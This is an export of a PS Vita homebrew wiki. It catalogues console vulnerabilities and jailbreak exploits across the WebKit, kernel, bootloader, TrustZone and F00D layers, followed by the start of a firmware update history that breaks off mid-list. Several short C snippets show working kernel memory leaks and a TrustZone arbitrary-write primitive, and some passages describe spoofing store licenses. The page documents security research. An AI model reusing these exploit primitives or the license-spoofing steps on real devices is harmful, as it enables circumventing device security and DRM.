Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team. Implemented in Mathieulh's early PSVita FW exploit chain.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg there].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11298System Software2019-07-23T22:19:50Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
